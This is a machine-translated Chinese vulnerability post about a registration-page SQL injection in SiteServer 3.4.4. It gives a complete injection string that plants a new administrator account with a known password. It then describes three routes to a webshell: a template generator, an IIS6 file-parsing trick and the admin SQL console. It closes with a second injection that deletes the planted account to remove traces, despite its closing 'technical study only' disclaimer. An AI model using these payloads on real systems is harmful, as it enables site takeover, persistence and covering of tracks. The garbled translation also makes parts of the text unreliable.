SiteServer 3.4.4 logical vulnerabilities lead to SQL injection-vulnerability warning-the black bar safety net

2011-10-26T00:00:00
ID MYHACK58:62201132149
Type myhack58
Reporter 佚名
Modified 2011-10-26T00:00:00

Description

Author: blue girl

The problem is in the UserCenter. Pages. DLL in the Register, the registration process is logical to have problems, as follows:

  1. The program put the user name into the database query, if the user name is not repeated, into the second step;

  2. Then in the remote detection of the user name if it contains illegal characters, if not, the process proceeds to a third step;

  3. The registration of new users into the database.

Since in the first step, the program does not perform any processing it into a database query, then you can xxoo. Orz。。。。

Example:

http://127.0.0.1/UserCenter/register.aspx

User name fill in the following statement, and other places properly filled.

1 2 3');insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

Submitted after registration to the library insert a user name: blue password: lanhai super user.

Default background address: http://127.0.0.1/siteserver

Get the webshell or directly mention the right to be a benevolent see benevolence the wise see wisdom of the living, each home has the home method, I probably looked, there are 3 kinds of method

One,

Site management-on display functions-template management-on the Add single page template-direct generate aspx

Second,

Member permissions-for adding user-on user name is: 1. asp

http://127.0.0.1/usercenter/

With just added 1. asp to login, go in after uploading a personal avatar, using IIS6 parsing vulnerabilities have webshell

(ps: the background to add the user does not verify whether it contains illegal characters

Third,

System Tools-on the utility-of the machine parameters view

You can see the database type, name, WEB path

System Tools-Database Tools-on the SQL statement query

This function do good, directly is equivalent to a Query Analyzer, what echoes are there, you can backup give the webshell, or the use of sqlserver improperly configured directly XXOO

Wrap-up: the

xxoo finished remember to

http://127.0.0.1/UserCenter/register.aspx

Then

1 2 3');delete bairong_Administrator where UserName='blue';--

For the user name to be registered, and do cleaner work.

Finally, I hope siteserver see after timely repair, this article only as a technical study, do not for illegal purposes.